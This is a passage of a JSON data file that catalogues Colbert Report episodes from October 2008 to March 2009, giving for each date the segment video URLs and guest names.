        "http://thecolbertreport.cc.com/videos/f1sjmz/colbert-aluminum---paris",
        "http://thecolbertreport.cc.com/videos/ihme7b/wynton-marsalis",
        "http://thecolbertreport.cc.com/videos/1zx8mm/good-night"
      ],
      "guest": "Fareed Zakaria, Wynton Marsalis"
    },
    {
      "date": "2008-10-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ipzwmk/intro---10-21-08",
        "http://thecolbertreport.cc.com/videos/1q0lgd/stephen-jr--campaigns-for-mccain",
        "http://thecolbertreport.cc.com/videos/6mt8jf/the-word---fantasyland",
        "http://thecolbertreport.cc.com/videos/yf6nbq/battle-of-the-gods",
        "http://thecolbertreport.cc.com/videos/ajdj8y/atone-phone---the-pony-down",
        "http://thecolbertreport.cc.com/videos/2f3tuj/michael-farris",
        "http://thecolbertreport.cc.com/videos/gsnyc0/another-one-tomorrow"
      ],
      "guest": "Michael Farris"
    },
    {
      "date": "2008-10-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zfo3j9/intro---10-22-08",
        "http://thecolbertreport.cc.com/videos/bnfehb/mccain-loves-the-middle-class",
        "http://thecolbertreport.cc.com/videos/2fhvot/too-much-political-knowledge",
        "http://thecolbertreport.cc.com/videos/l9sa9k/movies-that-are-destroying-america---quantum-of-solace",
        "http://thecolbertreport.cc.com/videos/bfif72/david-frum",
        "http://thecolbertreport.cc.com/videos/zijniy/thanks-to-cedric-the-entertainer"
      ],
      "guest": "David Frum"
    },
    {
      "date": "2008-10-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4fsdf9/intro---10-23-08",
        "http://thecolbertreport.cc.com/videos/mxdemq/the-palins-in-people-magazine",
        "http://thecolbertreport.cc.com/videos/9r8mtw/threatdown---who-s-nailin--paylin",
        "http://thecolbertreport.cc.com/videos/d9d59e/difference-makers---the-national-hummer-club",
        "http://thecolbertreport.cc.com/videos/vu40sp/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/4q4n65/a-short-goodbye"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2008-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/59kvnn/intro---10-27-08",
        "http://thecolbertreport.cc.com/videos/o5x5iu/mccain-guarantees-victory",
        "http://thecolbertreport.cc.com/videos/05r6nq/the-word---it-s-alive-",
        "http://thecolbertreport.cc.com/videos/7g8kx1/alpha-dog-of-the-week---mark-ciptak",
        "http://thecolbertreport.cc.com/videos/fnuvdv/yo-yo-ma"
      ],
      "guest": "Yo-Yo Ma"
    },
    {
      "date": "2008-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ghj64m/intro---10-28-08",
        "http://thecolbertreport.cc.com/videos/xk09yu/ted-stevens-is-found-guilty",
        "http://thecolbertreport.cc.com/videos/7j217q/obama-the-socialist",
        "http://thecolbertreport.cc.com/videos/bxzmkn/socialist-candidate-for-president---brian-moore",
        "http://thecolbertreport.cc.com/videos/wz2u1e/canton--ohio",
        "http://thecolbertreport.cc.com/videos/ytg04i/sherman-alexie",
        "http://thecolbertreport.cc.com/videos/jz4m1g/tickets-to-canada"
      ],
      "guest": "Brian Moore, Sherman Alexie"
    },
    {
      "date": "2008-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ix1wn7/intro---10-29-08",
        "http://thecolbertreport.cc.com/videos/ks5pt8/john-mccain-s-big-prank",
        "http://thecolbertreport.cc.com/videos/7qwbk4/the-word---i-endorse-barack-obama",
        "http://thecolbertreport.cc.com/videos/k5qv33/was-it-really-that-bad----the-great-depression",
        "http://thecolbertreport.cc.com/videos/cxwcsb/david-simon",
        "http://thecolbertreport.cc.com/videos/prhqai/colbert-completists"
      ],
      "guest": "David Simon"
    },
    {
      "date": "2008-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9sqk1r/intro---10-30-08",
        "http://thecolbertreport.cc.com/videos/b7m8ic/obama-infomercial",
        "http://thecolbertreport.cc.com/videos/7mbhhk/tip-wag---apple-computers",
        "http://thecolbertreport.cc.com/videos/tiopht/the-dacolbert-code---the-election",
        "http://thecolbertreport.cc.com/videos/ugfx1s/wilco-interview"
      ],
      "guest": "Wilco"
    },
    {
      "date": "2008-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gc439u/intro---11-03-08",
        "http://thecolbertreport.cc.com/videos/jtvn9v/2008-campaign-winners-and-losers",
        "http://thecolbertreport.cc.com/videos/q31c3b/charlie-cook",
        "http://thecolbertreport.cc.com/videos/syw57q/how-to-be-a-maverick",
        "http://thecolbertreport.cc.com/videos/3lix4b/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/5snsio/election-eve-prayer"
      ],
      "guest": "Charlie Cook, Andrew Sullivan"
    },
    {
      "date": "2008-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/deihkn/intro---11-05-08",
        "http://thecolbertreport.cc.com/videos/ek3v6r/president-obama",
        "http://thecolbertreport.cc.com/videos/p698of/the-word---change",
        "http://thecolbertreport.cc.com/videos/b3gurg/threatdown---black-presidents",
        "http://thecolbertreport.cc.com/videos/1bpyxl/andrew-young",
        "http://thecolbertreport.cc.com/videos/wmwkia/note-to-gorlock"
      ],
      "guest": "Ambassador Andrew Young"
    },
    {
      "date": "2008-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jvmllx/intro---11-06-08",
        "http://thecolbertreport.cc.com/videos/8cjwkf/obama-s-spider-battle",
        "http://thecolbertreport.cc.com/videos/91wunt/un-american-news---obama-edition",
        "http://thecolbertreport.cc.com/videos/aedolr/fallback-position---peter-earnest-pt--1",
        "http://thecolbertreport.cc.com/videos/tp44lf/rachel-maddow"
      ],
      "guest": "Rachel Maddow"
    },
    {
      "date": "2008-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3vbqce/intro---11-11-08",
        "http://thecolbertreport.cc.com/videos/t0o0ln/the-obamas-meet-the-bushes",
        "http://thecolbertreport.cc.com/videos/cf9i7o/proposition-8-protests---dan-savage",
        "http://thecolbertreport.cc.com/videos/a4htau/fallback-position---peter-earnest-pt--2",
        "http://thecolbertreport.cc.com/videos/97cxi9/kevin-johnson",
        "http://thecolbertreport.cc.com/videos/knwq1k/gay-black-violence"
      ],
      "guest": "Dan Savage, Kevin Johnson"
    },
    {
      "date": "2008-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jxnavl/intro---11-12-08",
        "http://thecolbertreport.cc.com/videos/hs06sa/formula-4ou1",
        "http://thecolbertreport.cc.com/videos/jdc5wl/the-word---pity-party",
        "http://thecolbertreport.cc.com/videos/vq5z69/cheating-death---women-s-health",
        "http://thecolbertreport.cc.com/videos/h8pdku/bob-woodward",
        "http://thecolbertreport.cc.com/videos/yj3fvl/good-night"
      ],
      "guest": "Bob Woodward"
    },
    {
      "date": "2008-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iy78xf/intro---11-13-08",
        "http://thecolbertreport.cc.com/videos/ws4itq/imaginary-gay-black-warfare",
        "http://thecolbertreport.cc.com/videos/54gy81/tip-wag---marvel-comics",
        "http://thecolbertreport.cc.com/videos/9so57k/rahm-emanuel-s-finger",
        "http://thecolbertreport.cc.com/videos/84locu/stephen-moore",
        "http://thecolbertreport.cc.com/videos/kwiam8/obama-spider-man-comic-bribe"
      ],
      "guest": "Stephen Moore"
    },
    {
      "date": "2008-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/edyiaw/intro---11-17-08",
        "http://thecolbertreport.cc.com/videos/vfh1d7/stephen-s-gma-appearance",
        "http://thecolbertreport.cc.com/videos/tyr5yf/barack-obama-is-hiring",
        "http://thecolbertreport.cc.com/videos/xubttj/obama-s-cabinet---tom-brokaw",
        "http://thecolbertreport.cc.com/videos/okezd5/soup-war",
        "http://thecolbertreport.cc.com/videos/lu8hmu/malcolm-gladwell",
        "http://thecolbertreport.cc.com/videos/f67l6s/stephen-drinks-soup"
      ],
      "guest": "Tom Brokaw, Malcolm Gladwell"
    },
    {
      "date": "2008-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cpar3w/intro---11-18-08",
        "http://thecolbertreport.cc.com/videos/gpyfhe/joe-lieberman-learns-his-fate",
        "http://thecolbertreport.cc.com/videos/tda4m3/the-word---love-lost",
        "http://thecolbertreport.cc.com/videos/rfqomg/stephen-s-vetting-process---cliff-sloan-pt--1"
      ],
      "guest": "Paul Simon"
    },
    {
      "date": "2008-11-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a4gbi9/intro---11-19-08",
        "http://thecolbertreport.cc.com/videos/3ebcnc/the-word---mad-men",
        "http://thecolbertreport.cc.com/videos/hjm6c3/stephen-s-vetting-process---cliff-sloan-pt--2",
        "http://thecolbertreport.cc.com/videos/p1vjk5/michael-lewis",
        "http://thecolbertreport.cc.com/videos/5n2dbq/tearful-apology"
      ],
      "guest": "Michael Lewis"
    },
    {
      "date": "2008-11-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cbvik4/intro---11-20-08",
        "http://thecolbertreport.cc.com/videos/ag7dg1/racism-is-over---cory-booker",
        "http://thecolbertreport.cc.com/videos/2frm4q/metunes---chinese-democracy",
        "http://thecolbertreport.cc.com/videos/c48nk9/thomas-friedman",
        "http://thecolbertreport.cc.com/videos/bd8wju/christmas-special-dvd-warning"
      ],
      "guest": "Cory Booker, Thomas L. Friedman"
    },
    {
      "date": "2008-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rpma6e/intro---12-01-08",
        "http://thecolbertreport.cc.com/videos/tq2nxp/operation-humble-kanye",
        "http://thecolbertreport.cc.com/videos/qarmhd/war-in-afghanistan",
        "http://thecolbertreport.cc.com/videos/rven6i/khaled-hosseini",
        "http://thecolbertreport.cc.com/videos/36dgrv/tip-wag---all-wag-christmas-edition",
        "http://thecolbertreport.cc.com/videos/7058uf/roland-fryer",
        "http://thecolbertreport.cc.com/videos/n1in3i/good-night"
      ],
      "guest": "Khaled Hosseini, Roland Fryer"
    },
    {
      "date": "2008-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cj7hhg/intro---12-02-08",
        "http://thecolbertreport.cc.com/videos/qvwoip/operation-humble-kanye---buy-stephen-s-album",
        "http://thecolbertreport.cc.com/videos/ztjt9g/the-word---a-man-named-plaxico",
        "http://thecolbertreport.cc.com/videos/fic3d1/colbert-platinum---christmas-edition",
        "http://thecolbertreport.cc.com/videos/bshkcz/jeffrey-goldberg",
        "http://thecolbertreport.cc.com/videos/utntlq/buy-stephen-s-boots-on-ebay"
      ],
      "guest": "Jeffrey Goldberg"
    },
    {
      "date": "2008-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/il4wbl/intro---12-03-08",
        "http://thecolbertreport.cc.com/videos/owefww/nasa-spider-escapes",
        "http://thecolbertreport.cc.com/videos/z33t4w/the-word---barack-handed-compliment",
        "http://thecolbertreport.cc.com/videos/mcfi82/nailed--em---radical-knitting",
        "http://thecolbertreport.cc.com/videos/2karre/barbara-walters",
        "http://thecolbertreport.cc.com/videos/r6ufyo/the-end--not-the-beginning"
      ],
      "guest": "Barbara Walters"
    },
    {
      "date": "2008-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d118oe/intro---12-04-08",
        "http://thecolbertreport.cc.com/videos/2fjry6/operation-humble-kanye---stephen-beats-kanye",
        "http://thecolbertreport.cc.com/videos/2d2zn0/pakistani-threat---bob-graham",
        "http://thecolbertreport.cc.com/videos/d5jif7/movies-that-are-destroying-america---holiday-movie-edition",
        "http://thecolbertreport.cc.com/videos/n7jvhg/nicholas-wade",
        "http://thecolbertreport.cc.com/videos/sugr09/returning-monday"
      ],
      "guest": "Sen. Bob Graham, Nicholas Wade"
    },
    {
      "date": "2008-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7u2bhk/intro---12-08-08",
        "http://thecolbertreport.cc.com/videos/ao9vg7/bush-kisses-streisand",
        "http://thecolbertreport.cc.com/videos/gctknh/the-word---season-of-giving",
        "http://thecolbertreport.cc.com/videos/6153k5/barry---the-stump",
        "http://thecolbertreport.cc.com/videos/hpitea/geoffrey-canada",
        "http://thecolbertreport.cc.com/videos/0r2h5l/stephen-on-conan"
      ],
      "guest": "Geoffrey Canada"
    },
    {
      "date": "2008-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4g9cia/intro---12-09-08",
        "http://thecolbertreport.cc.com/videos/onbk9a/rod-blagojevich-is-arrested",
        "http://thecolbertreport.cc.com/videos/600m6s/nixmas-tree-trimming---kevin-bacon",
        "http://thecolbertreport.cc.com/videos/yflimf/tek-jansen---beginning-s-first-dawn--episode-two-revisited",
        "http://thecolbertreport.cc.com/videos/srrck8/charlie-kaufman",
        "http://thecolbertreport.cc.com/videos/zkndmq/nixon-angel"
      ],
      "guest": "Kevin Bacon, Charlie Kaufman"
    },
    {
      "date": "2008-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u8ghsg/intro---12-10-08",
        "http://thecolbertreport.cc.com/videos/f9io4y/rod-blagojevich-s-birthday",
        "http://thecolbertreport.cc.com/videos/imth2d/threatdown---happiness",
        "http://thecolbertreport.cc.com/videos/jnn2lb/on-notice---forgiveness",
        "http://thecolbertreport.cc.com/videos/i1wzcc/richard-haass",
        "http://thecolbertreport.cc.com/videos/uw87dl/good-night"
      ],
      "guest": "Richard Haass"
    },
    {
      "date": "2008-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y3mqae/intro---12-11-08",
        "http://thecolbertreport.cc.com/videos/djirpd/michael-phelps",
        "http://thecolbertreport.cc.com/videos/j11gba/stephen-eats-ghost-ribs",
        "http://thecolbertreport.cc.com/videos/zc9rq9/the-ghost-of-stage-manager-bobby",
        "http://thecolbertreport.cc.com/videos/1756ia/the-word---the-unbearable-lightness-of-supreme-being"
      ],
      "guest": "Michael Phelps"
    }
  ],
  "2009": [
    {
      "date": "2009-01-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9k2tbm/intro---1-05-09",
        "http://thecolbertreport.cc.com/videos/za98w3/colbert-and-colmes---roland-burris-appointment",
        "http://thecolbertreport.cc.com/videos/hq4p9o/tek-jansen---beginning-s-first-dawn--episode-three",
        "http://thecolbertreport.cc.com/videos/nrlhy0/john-king",
        "http://thecolbertreport.cc.com/videos/5hoaoz/colbert-and-colmes---colmes-gets-fired"
      ],
      "guest": "Riley Crane"
    },
    {
      "date": "2009-01-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sn2rhf/ponzi-schemes",
        "http://thecolbertreport.cc.com/videos/k6j6as/hiding-gold---david-leonhardt",
        "http://thecolbertreport.cc.com/videos/4zhwch/better-know-a-district---utah-s-3rd---jason-chaffetz",
        "http://thecolbertreport.cc.com/videos/g9ppzt/matt-miller",
        "http://thecolbertreport.cc.com/videos/yys5yk/thank-you--stephen"
      ],
      "guest": "Capt. Charles Moore"
    },
    {
      "date": "2009-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z8rm3b/intro---01-07-09",
        "http://thecolbertreport.cc.com/videos/92yx1q/che-stadium",
        "http://thecolbertreport.cc.com/videos/d1e1eu/dr--gupta-s-penis-pyramid",
        "http://thecolbertreport.cc.com/videos/nqulkz/the-word---statute-of-liberty",
        "http://thecolbertreport.cc.com/videos/amgd80/tip-wag---cocaine-honey",
        "http://thecolbertreport.cc.com/videos/yau33c/benicio-del-toro"
      ],
      "guest": "James Fowler"
    },
    {
      "date": "2009-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/88kvmz/intro---01-08-09",
        "http://thecolbertreport.cc.com/videos/wcgnr1/new-york-times-abandons-dignity",
        "http://thecolbertreport.cc.com/videos/926dzf/yahweh-or-no-way---roland-burris",
        "http://thecolbertreport.cc.com/videos/fk4a9c/leg-wrestling-rematch",
        "http://thecolbertreport.cc.com/videos/gteixg/a-really-good-book",
        "http://thecolbertreport.cc.com/videos/6428p8/pro-commie-epic"
      ],
      "guest": "Lawrence Lessig"
    },
    {
      "date": "2009-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kni4vi/intro---01-12-09",
        "http://thecolbertreport.cc.com/videos/9c4f03/bush-s-last-press-conference",
        "http://thecolbertreport.cc.com/videos/bwmns5/the-word---sweet-smell-of-success",
        "http://thecolbertreport.cc.com/videos/0o1xwh/stephen-jr--on-christmas-eve",
        "http://thecolbertreport.cc.com/videos/dkx1ya/anthony-romero",
        "http://thecolbertreport.cc.com/videos/by8gkb/a-lot-more-to-say"
      ],
      "guest": "Anthony Romero"
    },
    {
      "date": "2009-01-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/32ytiz/intro---01-13-09",
        "http://thecolbertreport.cc.com/videos/fmzudp/bush-presidency-aged-us",
        "http://thecolbertreport.cc.com/videos/9et79a/cold-war-update---cuba",
        "http://thecolbertreport.cc.com/videos/m3x3ok/on-notice---limey-squirrel-eaters",
        "http://thecolbertreport.cc.com/videos/k1og3a/niall-ferguson",
        "http://thecolbertreport.cc.com/videos/5px40o/that-s-all-the-time-we-have"
      ],
      "guest": "Niall Ferguson"
    },
    {
      "date": "2009-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oyml2f/intro---01-14-09",
        "http://thecolbertreport.cc.com/videos/34mj4v/the-last-bush-effigy",
        "http://thecolbertreport.cc.com/videos/y0f472/p-k--winsome---obama-collectibles",
        "http://thecolbertreport.cc.com/videos/ur3zl1/little-victories---america-s-galaxy-is-big",
        "http://thecolbertreport.cc.com/videos/gizrjk/alan-khazei",
        "http://thecolbertreport.cc.com/videos/9hlcm3/commemorative-plates"
      ],
      "guest": "Alan Khazei"
    },
    {
      "date": "2009-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q7vz1i/intro---01-15-09",
        "http://thecolbertreport.cc.com/videos/95lbi6/bush-and-the-press",
        "http://thecolbertreport.cc.com/videos/sy3mow/bush-s-romance-with-the-media---david-gregory",
        "http://thecolbertreport.cc.com/videos/7iuuwa/tip-wag---monkey-on-the-lam",
        "http://thecolbertreport.cc.com/videos/ux2atw/shepard-fairey",
        "http://thecolbertreport.cc.com/videos/wfge8o/spay-and-neuter-your-pets"
      ],
      "guest": "David Gregory, Shepard Fairey"
    },
    {
      "date": "2009-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r1uwlh/intro---01-19-09",
        "http://thecolbertreport.cc.com/videos/ul1a7j/mlk-day-mascot",
        "http://thecolbertreport.cc.com/videos/lypf68/the-word---sacrifice",
        "http://thecolbertreport.cc.com/videos/ydvpvb/frank-rich",
        "http://thecolbertreport.cc.com/videos/52s3oy/boiling-frog-metaphor"
      ],
      "guest": "Frank Rich"
    },
    {
      "date": "2009-01-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ymrs37/stephen-s-inauguration-breakdown",
        "http://thecolbertreport.cc.com/videos/301bds/p-k--winsome---inauguration-merchandise",
        "http://thecolbertreport.cc.com/videos/9hjhcy/stephen-s-sound-advice---how-to-be-like-lincoln",
        "http://thecolbertreport.cc.com/videos/mmoodw/jabari-asim",
        "http://thecolbertreport.cc.com/videos/kai9la/stephen-realizes-he-s-black"
      ],
      "guest": "Jabari Asim"
    },
    {
      "date": "2009-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dl8i2q/intro---01-21-09",
        "http://thecolbertreport.cc.com/videos/l2d6st/president-yo-yo-ma",
        "http://thecolbertreport.cc.com/videos/axsw46/election-2012---chuck-todd",
        "http://thecolbertreport.cc.com/videos/xkmfex/stephen-s-remix-challenge",
        "http://thecolbertreport.cc.com/videos/8l6srp/elizabeth-alexander",
        "http://thecolbertreport.cc.com/videos/a3p8mj/good-night"
      ],
      "guest": "Elizabeth Alexander"
    },
    {
      "date": "2009-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0zgr4t/intro---01-22-09",
        "http://thecolbertreport.cc.com/videos/t6meak/near-president-obama",
        "http://thecolbertreport.cc.com/videos/mtzrkq/un-american-news---president-obama-edition",
        "http://thecolbertreport.cc.com/videos/689o7m/better-know-a-lobby---naacp",
        "http://thecolbertreport.cc.com/videos/8awmoy/jon-meacham",
        "http://thecolbertreport.cc.com/videos/ili9if/refreshing-sierra-mist"
      ],
      "guest": "Jon Meacham"
    },
    {
      "date": "2009-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7nxt06/intro---01-26-09",
        "http://thecolbertreport.cc.com/videos/4oz085/stephen-s-secret-prison",
        "http://thecolbertreport.cc.com/videos/cw8n8j/obama-s-new-science-policy---chris-mooney",
        "http://thecolbertreport.cc.com/videos/yxtpn8/tip-wag---john-yarmuth-s-holiday-card",
        "http://thecolbertreport.cc.com/videos/uj76wp/ed-young",
        "http://thecolbertreport.cc.com/videos/49ccbt/1-877-sean-930"
      ],
      "guest": "Chris Mooney, Ed Young"
    },
    {
      "date": "2009-01-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rwx1ie/intro---01-27-09",
        "http://thecolbertreport.cc.com/videos/8ws8hw/al-arabiya-kidnaps-obama",
        "http://thecolbertreport.cc.com/videos/ei15xx/cheating-death---lung-health",
        "http://thecolbertreport.cc.com/videos/yzw1s5/bill-o-reilly-doesn-t-report-rumors",
        "http://thecolbertreport.cc.com/videos/7ljyqd/philippe-petit",
        "http://thecolbertreport.cc.com/videos/qx6mra/omar-returns"
      ],
      "guest": "Philippe Petit"
    },
    {
      "date": "2009-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mrairj/exclusive---better-know-a-beatle---paul-mccartney",
        "http://thecolbertreport.cc.com/videos/qfnuqn/intro---01-28-09",
        "http://thecolbertreport.cc.com/videos/4c854b/countdown-to-atomic-disaster---the-wing-ageddon",
        "http://thecolbertreport.cc.com/videos/m2fb3c/denis-dutton",
        "http://thecolbertreport.cc.com/videos/x3yxrz/call-1-877-sean-930"
      ],
      "guest": "Paul McCartney, Denis Dutton"
    },
    {
      "date": "2009-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s0jwx0/intro---01-29-09",
        "http://thecolbertreport.cc.com/videos/7k3noc/rod-blagojevich-is-impeached",
        "http://thecolbertreport.cc.com/videos/05hiht/the-word---the-audacity-of-nope",
        "http://thecolbertreport.cc.com/videos/ra6q6v/sport-report---chicken-wing-spokesman-richard-lobb",
        "http://thecolbertreport.cc.com/videos/n7s40p/john-podesta",
        "http://thecolbertreport.cc.com/videos/t92qhf/goodnight-illinois-gov--patrick-quinn"
      ],
      "guest": "John Podesta"
    },
    {
      "date": "2009-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2e9hx6/intro---02-02-09",
        "http://thecolbertreport.cc.com/videos/qx0vt7/the-lilly-ledbetter-fair-pay-act",
        "http://thecolbertreport.cc.com/videos/3n4xx4/it-could-be-worse---iceland",
        "http://thecolbertreport.cc.com/videos/9kc6le/nailed--em---amtrak-photographer",
        "http://thecolbertreport.cc.com/videos/1tdafu/dan-zaccagnino",
        "http://thecolbertreport.cc.com/videos/z0ddpw/so-long--farewell"
      ],
      "guest": "Dan Zaccagnino"
    },
    {
      "date": "2009-02-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5d9tuo/intro---02-03-09",
        "http://thecolbertreport.cc.com/videos/cfzmri/tom-daschle-steps-down",
        "http://thecolbertreport.cc.com/videos/b8o45v/the-word---army-of-one",
        "http://thecolbertreport.cc.com/videos/eo7n2c/colbert-platinum---ass-covering-edition",
        "http://thecolbertreport.cc.com/videos/lr21yl/henry-louis-gates--jr-",
        "http://thecolbertreport.cc.com/videos/fz6ra7/all-the-show-we-have-time-for"
      ],
      "guest": "Henry Louis Gates Jr."
    },
    {
      "date": "2009-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hm493e/intro---02-04-09",
        "http://thecolbertreport.cc.com/videos/7z1jvo/stephen-verbally-thrashes-steve-martin",
        "http://thecolbertreport.cc.com/videos/1t7nor/yahweh-or-no-way---the-super-bowl",
        "http://thecolbertreport.cc.com/videos/vtzs6d/who-s-not-honoring-me-now----the-newberry-awards",
        "http://thecolbertreport.cc.com/videos/7z3biy/tell-your-friends"
      ],
      "guest": "Steve Martin"
    },
    {
      "date": "2009-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oqo6m1/intro---02-05-09",
        "http://thecolbertreport.cc.com/videos/hkvbbb/stelephant-colbert-the-elephant-seal",
        "http://thecolbertreport.cc.com/videos/7v0jg2/economic-stimulus-debate",
        "http://thecolbertreport.cc.com/videos/9xbuuq/economic-stimulus-bill---james-surowiecki",
        "http://thecolbertreport.cc.com/videos/e378n6/alpha-dog-of-the-week---boy-scouts-of-america",
        "http://thecolbertreport.cc.com/videos/avti1a/jonah-lehrer",
        "http://thecolbertreport.cc.com/videos/qj4lmo/keep-your-friends-close"
      ],
      "guest": "James Surowiecki, Jonah Lehrer"
    },
    {
      "date": "2009-02-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vp4fvu/intro---02-09-09",
        "http://thecolbertreport.cc.com/videos/it28fw/the-new-word-czar",
        "http://thecolbertreport.cc.com/videos/13lrs0/threatdown---gay-divorce",
        "http://thecolbertreport.cc.com/videos/hr5hvl/al-gore-steals-stephen-s-grammy"
      ],
      "guest": "TV on the Radio"
    },
    {
      "date": "2009-02-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fv48bo/intro---02-10-09",
        "http://thecolbertreport.cc.com/videos/mj9pcq/the-visa-black-card",
        "http://thecolbertreport.cc.com/videos/l6kty8/the-word---loyal-opposition",
        "http://thecolbertreport.cc.com/videos/nj38bb/shout-out---honey--counterterrorism---an-old-guard-flag",
        "http://thecolbertreport.cc.com/videos/9w33a7/robert-ballard",
        "http://thecolbertreport.cc.com/videos/gissod/you-look-like-stephen"
      ],
      "guest": "Robert Ballard"
    },
    {
      "date": "2009-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/smxfup/intro---02-11-09",
        "http://thecolbertreport.cc.com/videos/l5ealo/westminster-dog-show-snub---formula-40-woof",
        "http://thecolbertreport.cc.com/videos/jxgbb9/dc-voting-rights-act---eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/wfrwar/truth-from-the-gut",
        "http://thecolbertreport.cc.com/videos/42vhyq/steven-pinker",
        "http://thecolbertreport.cc.com/videos/tpb22v/good-night----except-for-the-west-coast"
      ],
      "guest": "Eleanor Holmes Norton, Steven Pinker"
    },
    {
      "date": "2009-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m1tx5d/exclusive---stephen-s-sexiest-moments",
        "http://thecolbertreport.cc.com/videos/f0688o/obama-poster-debate---david-ross-and-ed-colbert",
        "http://thecolbertreport.cc.com/videos/vgbtpp/the-dacolbert-code---oscar-predictions",
        "http://thecolbertreport.cc.com/videos/tbf4y6/adam-gopnik",
        "http://thecolbertreport.cc.com/videos/okmu84/goodbye--conan-o-brien"
      ],
      "guest": "David Ross, Ed Colbert, Adam Gopnik"
    },
    {
      "date": "2009-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9ynh43/intro---02-23-09",
        "http://thecolbertreport.cc.com/videos/xlgfrl/stephen-s-prayer-day",
        "http://thecolbertreport.cc.com/videos/legx6j/stephen-s-moral-dimension",
        "http://thecolbertreport.cc.com/videos/om9959/helen-fisher"
      ],
      "guest": "Father James Martin, Helen Fisher"
    },
    {
      "date": "2009-02-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mngx54/mardi-gras-celebrations",
        "http://thecolbertreport.cc.com/videos/9jcm4g/1997-flashback",
        "http://thecolbertreport.cc.com/videos/pljjhc/nailed--em---buffet-crime",
        "http://thecolbertreport.cc.com/videos/n75sz3/cliff-sloan",
        "http://thecolbertreport.cc.com/videos/yg82dj/happy-mardi-gras",
        "http://thecolbertreport.cc.com/videos/823sva/turning-to-religion---jim-martin",
        "http://thecolbertreport.cc.com/videos/gks8m8/breaded-fish-sticks"
      ],
      "guest": "Cliff Sloan"
    },
    {
      "date": "2009-02-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4v3vka/intro---02-25-09",
        "http://thecolbertreport.cc.com/videos/fbot0q/obama-s-congressional-address---jindal-s-response",
        "http://thecolbertreport.cc.com/videos/o1f5mr/tip-wag---gorilla-crabs-and-gandhi-s-shoes",
        "http://thecolbertreport.cc.com/videos/jyyb0h/john-fetterman",
        "http://thecolbertreport.cc.com/videos/10ufmk/bears---balls---company-bailouts"
      ],
      "guest": "John Fetterman"
    },
    {
      "date": "2009-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lvfhs2/intro---02-26-09",
        "http://thecolbertreport.cc.com/videos/1q3zjs/claire-mccaskill-s-twittering",
        "http://thecolbertreport.cc.com/videos/5j9jjo/conservative-rap-battle---stephen-challenges-michael-steele",
        "http://thecolbertreport.cc.com/videos/831wm1/kris-kristofferson",
        "http://thecolbertreport.cc.com/videos/lh0vwj/the-word---ablacknophobia",
        "http://thecolbertreport.cc.com/videos/um02qq/analog-tv"
      ],
      "guest": "Kris Kristofferson"
    },
    {
      "date": "2009-03-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tfciz3/conservative-rap-battle---michael-steele-gets-served",
        "http://thecolbertreport.cc.com/videos/xtntgt/snow-in-the-studio",
        "http://thecolbertreport.cc.com/videos/52t6yh/p-k--winsome---defective-obama-collectibles",
        "http://thecolbertreport.cc.com/videos/j78ngs/david-byrne"
      ],
      "guest": "David Byrne"
    },
    {
      "date": "2009-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qs5iv1/beer-pong-herpes-outbreak",
        "http://thecolbertreport.cc.com/videos/0c92nb/guns-for-roses",
        "http://thecolbertreport.cc.com/videos/l9p0ah/space-module--colbert---name-nasa-s-node-3-after-stephen",
